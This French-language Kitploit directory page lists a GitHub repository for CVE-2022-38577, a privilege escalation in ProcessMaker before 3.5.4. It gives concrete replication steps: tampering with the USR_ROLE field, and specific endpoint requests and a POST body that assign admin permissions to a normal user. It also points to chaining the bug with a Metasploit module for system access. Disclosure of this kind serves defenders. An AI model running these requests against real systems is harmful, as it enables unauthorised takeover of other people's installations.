Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-38577-Processmaker — ProcessMaker avant la v3.5.4 a été découvert comme contenant des permissions non sécurisées dans la page de profil utilisateur. Cette vulnérabilité permet aux attaquants d'élever des utilisateurs normaux au rang d'administrateurs. | Kitploit
Outils/GitHubGitHub/sornram9254/cve-2022-38577-processmaker
Escalade de PrivilègesFrameworks d'ExploitationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionArchived
GitHubsornram9254/cve-2022-38577-processmaker

CVE-2022-38577-Processmaker

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ProcessMaker avant la v3.5.4 a été découvert comme contenant des permissions non sécurisées dans la page de profil utilisateur. Cette vulnérabilité permet aux attaquants d'élever des utilisateurs normaux au rang d'administrateurs.

Voir le dépôt
31il y a 1 anPas encore vérifié

Ce dépôt a été archivé et déplacé vers : https://github.com/sornram9254/CVE-BBP-VDP


ProcessMaker - Élévation de privilèges du profil utilisateur

CVE-2022-38577

ProcessMaker, avant la v3.5.4, a été découvert comme contenant des permissions non sécurisées dans la page de profil utilisateur. Cette vulnérabilité permet aux attaquants d'élever des utilisateurs normaux au rang d'administrateurs.

* Cet exploit peut être utilisé avec le module Metasploit (ProcessMaker Plugin Upload) - exploit/multi/http/processmaker_plugin_upload pour obtenir un accès système.

root@kitploit:~
Privilege Escalation replication.
for 2.5.0 - 3.0 GA:
    1. Log in as normal user.
    2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".
    3. Refresh page to get new role.

for 3.2.1 and before:
    1. Log in as normal user.
    2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"
    3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"
    4. Update role to escalation privileges using POST Body request:
    POST /sysworkflow/en/neoclassic/roles/roles_Ajax
    request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}

https://youtu.be/PVaChDG3ZQ0
CVE-2022-38577 : ProcessMaker - Élévation de privilèges du profil utilisateur

TODO: Optimiser le code [module requests], et la gestion des exceptions.

Références :
[x] https://nvd.nist.gov/vuln/detail/CVE-2022-38577
[x] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38577
[x] https://packetstormsecurity.com/files/168427/ProcessMaker-Privilege-Escalation.html
[x] https://drive.google.com/file/d/1iP9NYUkYEy_FGMpcnTkUWn8nGcqDT02_/view?usp=sharing

Télécharger l’outil